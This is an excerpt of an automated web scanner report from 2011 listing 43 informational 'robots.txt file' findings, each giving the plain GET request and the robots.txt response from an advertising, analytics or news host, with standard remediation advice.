Set-Cookie: dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:10:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:10:04 GMT
Content-Length: 249175


...[SNIP]...
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/445/21445/Holiday-Inn-Hotel-Suites-BOSTON-PEABODY-Hotel-Exterior-41-20110820-190324-704.jpg&#034;
                       }
   }" />
...[SNIP]...
25. Robots.txt file  previous  next
There are 43 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

25.1. http://a.analytics.yahoo.com/fpc.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.analytics.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-control: public, max-age=86400
Last-Modified: Wed, 24 Aug 2011 07:44:03 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /
25.2. http://ad-dc2.adtech.de/adperf%7C2.0%7C327%7C2812329%7C0%7C170%7CAdId=6453063  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-dc2.adtech.de
Path:   /adperf%7C2.0%7C327%7C2812329%7C0%7C170%7CAdId=6453063

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad-dc2.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /
25.3. http://ad.doubleclick.net/adj/cm.guardian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.guardian/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 02 Oct 2011 23:51:36 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
25.4. http://ad.technoratimedia.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.technoratimedia.com

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 23:52:56 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:52:56 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /
25.5. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:53:00 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server
25.6. http://ad.yieldmanager.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 23:48:54 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:48:54 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /
25.7. http://ad4.liverail.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad4.liverail.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sun, 02 Oct 2011 23:51:35 GMT
ETag: "4195174610"
Last-Modified: Mon, 26 Sep 2011 21:54:57 GMT
Server: lighttpd/1.4.29-devel-4:6M
Content-Length: 27
Connection: Close

User-agent: *
Disallow: /

25.8. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:17d7"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 02 Oct 2011 23:49:38 GMT
Connection: close

User-agent: *
Disallow: /
25.9. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserver.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /
25.10. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 03 Oct 2011 23:50:07 GMT
Date: Sun, 02 Oct 2011 23:50:07 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400

User-agent: *
Disallow: /
25.11. http://bcp.crwdcntrl.net/4/c=412%7Crand=756616954%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=412%7Crand=756616954%7Cpv=y%7Crt=ifr

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:09 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 14 Dec 2010 16:21:02 GMT
ETag: "1930744-1a-4976134e6b780"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
25.12. http://beacon.securestudies.com/scripts/beacon.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /scripts/beacon.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 03 Oct 2011 23:52:41 GMT
Date: Sun, 02 Oct 2011 23:52:41 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400

User-agent: *
Disallow: /
25.13. http://c.betrad.com/a/n/44/546.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /a/n/44/546.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9152d7f1724ed8fbcd2e0c87029f193c:1276881254"
Last-Modified: Fri, 18 Jun 2010 17:14:14 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Sun, 02 Oct 2011 23:51:37 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /
25.14. http://cas.criteo.com/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /delivery/ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cas.criteo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sun, 02 Oct 2011 23:49:00 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /
25.15. http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.flashtalking.com
Path:   /xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.flashtalking.com

Response

HTTP/1.0 200 OK
x-amz-id-2: z88F6pWVIpUbd94kU6D7ufWeHDFBPzX7TQQmO5OMImvSrNTvpVmI0jloWHEiVW6Y
x-amz-request-id: C70663BD6E87DE03
Last-Modified: Mon, 30 May 2011 14:14:59 GMT
ETag: "668fd8017cd29b59e7d21e83b7303951"
Content-Type:
Content-Length: 41
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:53:31 GMT
Connection: close

# Do not crawl
User-agent: *
Disallow: /
25.16. http://cdn.turn.com/server/ddc.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Sun, 02 Oct 2011 23:53:04 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server
25.17. http://d.tradex.openx.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.tradex.openx.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:00 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "3fc8fa-131-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...
25.18. http://ehg-twi.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /HG

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ehg-twi.hitbox.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:17 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Mon, 03 Oct 2011 00:49:17 GMT
Content-Type: text/plain
Content-Length: 36

User-agent: *
Disallow: /Diagnostic
25.19. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 02 Oct 2011 21:00:56 GMT
Expires: Mon, 03 Oct 2011 21:00:56 GMT
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 10206

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
25.20. http://hits.guardian.co.uk/b/ss/guardiangu-football,guardiangu-network/1/H.22.1/s95621589564252  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hits.guardian.co.uk
Path:   /b/ss/guardiangu-football,guardiangu-network/1/H.22.1/s95621589564252

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: hits.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:01 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "10a342-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www78
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
25.21. http://idpix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: idpix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Sun, 02 Oct 2011 23:50:11 GMT
Connection: close

# go away
User-agent: *
Disallow: /
25.22. http://kantarmedia.guardian.co.uk/RealMedia/ads/adstream.cap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kantarmedia.guardian.co.uk
Path:   /RealMedia/ads/adstream.cap

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: kantarmedia.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jan 2008 16:38:45 GMT
ETag: "39d9bc-1a-442d407034f40"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /
25.23. http://m.xp1.ru4.com/activity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/plain
Last-modified: Fri, 31 Jul 2009 18:32:10 GMT
Content-length: 26
Etag: "1a-4a7338aa"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /
25.24. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oas.guardian.co.uk
Path:   /RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oas.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jan 2008 16:38:45 GMT
ETag: "23678d-1a-442d407034f40"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /
25.25. http://openx.px.invitemedia.com/openx_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://openx.px.invitemedia.com
Path:   /openx_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: openx.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 02 Oct 2011 23:52:30 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
25.26. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://panel.kantarmedia.com
Path:   /0/KantarMedia-Panel/panel/set_panel.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: panel.kantarmedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jan 2008 16:38:45 GMT
ETag: "ff614-1a-442d407034f40"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /
25.27. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-e4m3Yko6bFYVc.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 03 Oct 2011 23:48:53 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: QS

User-agent: *
Disallow: /
25.28. http://premiumtv.122.2o7.net/b/ss/premiumtvpremierleague/1/H.2-pdv-2/s98395569906570  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtvpremierleague/1/H.2-pdv-2/s98395569906570

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: premiumtv.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:17 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "29d113-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www90
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
25.29. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:37 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server
25.30. http://resource.guim.co.uk/books/gubookshop/thumbnail/images.bertrams.com/ProductImages/services/GetImage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://resource.guim.co.uk
Path:   /books/gubookshop/thumbnail/images.bertrams.com/ProductImages/services/GetImage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: resource.guim.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 May 2011 08:35:57 GMT
Server: Apache
X-GU-httpd: 05
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: public, max-age=911579
Expires: Thu, 13 Oct 2011 13:03:56 GMT
Date: Sun, 02 Oct 2011 23:50:57 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /
25.31. http://s0.2mdn.net/2502400/LloydsTSB_PIA_Direct_728x90.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /2502400/LloydsTSB_PIA_Direct_728x90.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 02 Oct 2011 22:51:28 GMT
Expires: Mon, 03 Oct 2011 22:51:28 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 3670

User-agent: *
Disallow: /
25.32. http://safebrowsing.clients.google.com/safebrowsing/gethash  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/gethash

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 30 Sep 2011 20:43:32 GMT
Date: Sun, 02 Oct 2011 23:49:44 GMT
Expires: Sun, 02 Oct 2011 23:49:44 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Allow: /catalogs/about
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /
...[SNIP]...
25.33. https://secure.mlb.com/resetPassword.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /resetPassword.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.mlb.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:23 GMT
Server: Sun-ONE-Web-Server/6.1
Last-Modified: Wed, 15 Mar 2006 17:08:42 GMT
ETag: "1a-a0b33a80"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=10
Expires: Sun, 02 Oct 2011 23:48:33 GMT
Keep-Alive: timeout=120, max=861
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /
25.34. http://servedby.flashtalking.com/imp/1/16628  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: servedby.flashtalking.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Sun, 02 Oct 2011 23:53:29 GMT
Server: Jetty(6.1.22)
Content-Type: text/plain
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 78

# Do not crawl
User-agent: *
Disallow: /

25.35. http://speed.pointroll.com/PointRoll/Media/Banners/ToyoTires/894167/ProxesSweeps_300x250_Flash_r01.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /PointRoll/Media/Banners/ToyoTires/894167/ProxesSweeps_300x250_Flash_r01.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 15 Sep 2005 12:53:14 GMT
Accept-Ranges: bytes
ETag: "394b626ff4b9c51:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 02 Oct 2011 23:49:49 GMT
Connection: close

User-agent: *
Disallow: /
25.36. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca0 3232
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *
25.37. http://tag.admeld.com/id  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /id

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Fri, 30 Sep 2011 18:23:44 GMT
ETag: "6af024c-1a-4ae2cb9b0ac00"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Sun, 02 Oct 2011 23:49:01 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

User-agent: *
Disallow: /
25.38. http://www.goal.com/en/teams/england/97/man-utd-news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goal.com
Path:   /en/teams/england/97/man-utd-news

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goal.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sun, 02 Oct 2011 23:52:00 GMT
Last-Modified: Mon, 29 Aug 2011 14:32:11 GMT
Server: ECS (sjo/5238)
X-Cache: HIT
Content-Length: 59
Connection: close

User-agent: *
Allow: /
Sitemap: http://www.goal.com/sitemap
25.39. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 23 Sep 2011 00:58:54 GMT
Date: Sun, 02 Oct 2011 23:48:55 GMT
Expires: Sun, 02 Oct 2011 23:48:55 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 57
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
25.40. http://www.guardian.co.uk/football/manchester-united  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/manchester-united

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:56 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 10:57:16 GMT
Accept-Ranges: bytes
Content-Length: 1909
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 58
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

##ACAP version=1.0

# Conventional policies...
User-agent: *
Disallow: /sendarticle/
Disallow: /Users/
Disallow: /users/
Disallow: /*/print$
Disallow: /email/
Disallow: /contactus/
Disallow: /share/
D
...[SNIP]...
25.41. http://www.luminate.com/widget/v3/53d1ac1014/config/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /widget/v3/53d1ac1014/config/

Issue detail

The web server contains a robots.txt file.

Request

